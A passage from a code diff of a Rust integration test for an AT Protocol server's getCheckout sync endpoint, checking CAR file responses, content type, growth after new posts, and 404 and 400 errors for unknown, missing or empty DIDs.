request"); 75 assert_eq!(res.status(), StatusCode::OK); 76 + assert_eq!(res.headers().get("content-type").and_then(|h| h.to_str().ok()), Some("application/vnd.ipld.car")); 77 let body = res.bytes().await.expect("Failed to get body"); 78 assert!(!body.is_empty(), "CAR file should not be empty"); 79 assert!(body.len() > 50, "CAR file should contain actual data"); 80 + assert!(body.len() >= 2, "CAR file should have at least header length"); 81 + for i in 0..4 { 82 tokio::time::sleep(std::time::Duration::from_millis(50)).await; 83 create_post(&client, &did, &jwt, &format!("Checkout post {}", i)).await; 84 } 85 + let multi_res = client 86 + .get(format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await)) 87 .query(&[("did", did.as_str())]) 88 + .send().await.expect("Failed to send request"); 89 + assert_eq!(multi_res.status(), StatusCode::OK); 90 + let multi_body = multi_res.bytes().await.expect("Failed to get body"); 91 + assert!(multi_body.len() > 500, "CAR file with 5 records should be larger"); 92 + let not_found_res = client 93 + .get(format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await)) 94 + .query(&[("did", "did:plc:nonexistent12345")]) 95 + .send().await.expect("Failed to send request"); 96 + assert_eq!(not_found_res.status(), StatusCode::NOT_FOUND); 97 + let error_body: Value = not_found_res.json().await.unwrap(); 98 + assert_eq!(error_body["error"], "RepoNotFound"); 99 + let missing_res = client 100 + .get(format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await)) 101 + .send().await.expect("Failed to send request"); 102 + assert_eq!(missing_res.status(), StatusCode::BAD_REQUEST); 103 + let empty_did_res = client 104 + .get(format!("{}/xrpc/com.atproto.sync.getCheckout", base_url().await)) 105 + .query(&[("did", "")]) 106 + .send().await.expect("Failed to send request"); 107 + assert_eq!(empty_did_res.status(), StatusCode::BAD_REQUEST); 108 }